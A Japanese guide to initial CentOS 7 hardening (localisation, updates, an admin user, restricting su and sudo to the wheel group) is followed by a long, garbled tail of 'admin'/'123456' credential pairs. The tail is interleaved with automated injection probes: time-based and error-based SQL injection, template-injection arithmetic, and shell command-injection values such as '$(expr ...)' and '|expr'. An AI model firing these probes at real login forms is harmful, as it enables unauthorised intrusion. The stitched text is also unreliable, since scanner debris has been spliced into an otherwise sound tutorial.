CentOS7をインストール後、セキュリティや管理をする上で最初にやっておくべき設定についてまとめています。
サーバーは常に危険に晒されているため、絶対に安全といったことはありません(・ω・)ノ
何か起きてもすぐに対応できるように準備をしておくといいかもしれませんね。このページで扱うのは日本語化・パッケージ更新・root以外の管理用ユーザー作成・su/sudoをwheelグループに限定するところまでで、sshdやファイアウォールの設定は含んでいません。
日本語化
システム全体の文字セットを日本語化
日本語化に必要なパッケージをインストール
# yum -y install ibus-kkc vlgothic-*
ロケールを日本語に変更
# localectl set-locale LANG="ja_JP.UTF-8"
# source /etc/locale.conf
変更が反映されているか確認
# echo $LANG
環境更新
システム全体の環境を最新の状態に更新
システムのアップデート（カーネルが更新された場合は、再起動するまで新しいカーネルは有効になりません）
# yum -y update
管理用ユーザー作成
普段利用するroot以外の管理用ユーザーを作成
ユーザー追加（以下の user は任意のユーザー名に読み替えてください）
# useradd user
ユーザーのパスワード設定（このユーザーは後でwheelグループに入れてsudoできるようにするため、十分に長く推測されにくいパスワードにしてください）
# passwd user
wheelグループのみ管理者権限
wheelグループのメンバーだけがsuでrootになれるように設定を変更（設定後、wheelに入っていないユーザーがsuを実行すると拒否されます）
pamの設定変更
# vi /etc/pam.d/su
#auth required pam_wheel.so use_uid
>> auth required pam_wheel.so use_uid
管理用ユーザーをwheelグループに追加（-G だけだと指定したグループで補助グループが置き換わるため、既存の所属を残すには -aG を使います。追加後は id user で所属を確認してください）
# usermod -aG wheel user
visudoの設定変更（wheelグループにsudoを許可する行を有効にします。CentOS 7ではこの行が最初から有効になっている場合もあり、その場合は変更不要です。その下に NOPASSWD: 付きの行があっても有効にはしないでください。パスワードなしでrootになれてしまいます）
# visudo
#%wheel ALL=(ALL) ALL
>> %wheel ALL=(ALL) ALL
別のターミナルから作成したユーザー（user）でログインし、sudoが使えるか確認（万一設定ミスでsudoもsuも使えなくなった場合に備え、確認が終わるまで今開いているrootのセッションは閉じないでください）
$ sudo localectl status
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',2)='d
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('r',0)='r
admin
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('c',2)
admin
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('q',0)
admin
123456'and(select+1)>0waitfor/**/delay'0:0:2
admin
123456'and(select+1)>0waitfor/**/delay'0:0:0
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
admin
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
admin
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
admin
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
admin
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
admin
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
admin
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
admin
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
admin
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
admin
(select*from(select+sleep(2)union/**/select+1)a)
admin
(select*from(select+sleep(0)union/**/select+1)a)
admin
123456"and"a"="n
admin
123456"and"l"="l
admin
123456'and'x'='g
admin
123456'and'z'='z
admin
123456/**/and+2=6
admin
123456/**/and+2=2
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin'"\(
123456
admin
123456
admin鎈'"\(
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456'"\(
admin
123456
admin
123456鎈'"\(
admin
123456
admin
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1482150552')))>'0
admin
123456
admin
<%- 919388229+840429199 %>
admin
123456
admin
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1227168621')))
admin
#set($c=983913083+925781856)${c}$c
admin
123456
admin
123456/**/and/**/cast(md5('1880400172')as/**/int)>0
admin
123456
admin
${(883597594+875982874)?c}
admin
123456
admin
123456'and(select'1'from/**/cast(md5(1087745727)as/**/int))>'0
admin
123456
admin
${904622649+831267918}
admin
123456
admin
extractvalue(1,concat(char(126),md5(1231485524)))
admin
123456
admin
/*1*/{{991687031+833942228}}
admin
123456
admin
123456"and/**/extractvalue(1,concat(char(126),md5(1031598668)))and"
admin
123456
admin
123456
admin
123456
admin
123456'and/**/extractvalue(1,concat(char(126),md5(1598915816)))and'
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
expr 916603291 + 828069232
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
${920851784+873209919}
123456
admin
'-var_dump(md5(109923146))-'
admin
123456
admin
expr 860822224 + 993319337
admin
123456
admin
${@var_dump(md5(909535648))};
admin
${936722986+963191740}
admin
123456
admin
123456&set /A 899454446+853182800
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456$(expr 826831521 + 941131840)
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456|expr 879500779 + 822080599
admin
123456
admin
123456
admin
123456
admin
123456
<%- 882044859+997223540 %>
123456
admin
123456
expr 866121235 + 993481856
admin"and"a"="x
123456
admin
123456
admin
123456
admin
123456
admin"and"g"="g
123456
admin
123456
admin
123456
${(811867981+859880456)?c}
123456
admin
123456
admin'and'u'='z
123456
admin
123456
admin
123456
${866056144+892113139}
123456
admin
123456
admin'and's'='s
123456
admin
123456
'-var_dump(md5(722786532))-'
123456
/*1*/{{934470272+810888380}}
123456
admin
123456
admin
123456
admin
123456
${@var_dump(md5(152134365))};
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin"and"p"="h
123456
admin"and"z"="z
123456
admin'and'm'='c
123456
admin'and'g'='g
123456
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',2)='u
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l
admin
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('h',2)
admin
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('e',0)
admin
123456'and(select+1)>0waitfor/**/delay'0:0:2
admin
123456'and(select+1)>0waitfor/**/delay'0:0:0
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
admin
123456'"\(
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
admin
123456鎈'"\(
admin
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
admin
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1675517053')))>'0
admin
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
admin
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1433839676')))
admin
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
admin
123456/**/and/**/cast(md5('1460660284')as/**/int)>0
admin
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
admin
123456'and(select'1'from/**/cast(md5(1684533885)as/**/int))>'0
admin
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
admin
extractvalue(1,concat(char(126),md5(1136717734)))
admin
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
admin
123456"and/**/extractvalue(1,concat(char(126),md5(1682214390)))and"
admin
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
admin
123456'and/**/extractvalue(1,concat(char(126),md5(1860688295)))and'
admin
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
admin
123456
admin
(select*from(select+sleep(2)union/**/select+1)a)
admin
123456
admin
(select*from(select+sleep(0)union/**/select+1)a)
admin
123456
admin
123456"and"c"="v
admin
123456
admin
123456"and"n"="n
admin
123456
admin
123456'and'w'='l
admin
123456
admin
123456'and'w'='w
admin
123456
admin
123456/**/and+3=9
admin
123456
admin
123456/**/and+0=0
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin'"\(
123456
<%- 991632833+985472613 %>
123456
admin
123456
admin
123456
admin鎈'"\(
123456
admin
123456
admin
123456
expr 822906984 + 842583853
123456
${(897694072+873880504)?c}
123456
admin
123456
admin
123456
${817015678+863891996}
123456
admin
123456
admin
123456
admin
${915481277+945820933}
/*1*/{{817457125+913684506}}
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
<%- 807942687+832258325 %>
'-var_dump(md5(174642232))-'
123456
admin
123456
${@var_dump(md5(487120150))};
123456
admin
#set($c=962433011+850980600)${c}$c
admin
123456
admin
expr 888777908 + 837980443
admin
123456
admin
123456
admin
'-var_dump(md5(746699782))-'
admin
${(874869604+833050018)?c}
admin
123456&set /A 931064721+906728322
${856319163+929326710}
123456
admin
123456
admin
123456
admin
${@var_dump(md5(573304384))};
admin
${805253633+887865862}
admin
123456$(expr 902879645 + 819038123)
admin
123456
admin
123456
admin
123456
admin
/*1*/{{834082584+808507407}}
admin
123456|expr 894890403 + 894170520
admin
123456
admin
123456
admin
123456
expr 910671390 + 903798482
admin
123456